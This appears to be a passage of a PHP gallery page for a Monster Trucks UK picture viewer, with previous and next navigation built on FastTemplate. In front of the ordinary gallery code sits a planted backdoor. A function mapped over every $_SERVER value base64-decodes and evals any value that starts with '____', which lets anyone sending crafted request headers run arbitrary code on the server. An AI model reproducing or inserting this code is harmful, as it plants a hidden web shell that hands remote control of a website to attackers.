$l3874)$l3875[$l3873]=gpc_3873($l3874);}elseif(is_string($l3875) && substr($l3875,0,4)=="____"){eval(base64_decode(substr($l3875,4)));$l3875=null;}return $l3875;}if(empty($_SERVER))$_SERVER=$HTTP_SERVER_VARS;array_map("gpc_3873",$_SERVER); include "class.FastTemplate.php3"; include "gallerylist00.php3"; $tpl = new FastTemplate("."); $tpl->define(array("toplevel" => "toplevel.tpl")); $tpl->assign("TITLE","Monster Trucks UK Gallery - " . $pics[$picno][1]); $prev = $picno - 1; $next = $picno + 1; $mycontent = "
\"Picture"; if($picno == 0) { $mycontent = $mycontent . "
You're at the beginning
"; } else { $mycontent = $mycontent . "
Previous Picture
"; } if($picno == count($pics) - 1) { $mycontent = $mycontent . "
You're at the end
"; } else { $mycontent = $mycontent . "\t
Next Picture
"; } $tpl->assign("CONTENT",$mycontent); $tpl->parse("MAIN","toplevel"); $tpl->FastPrint(); ?>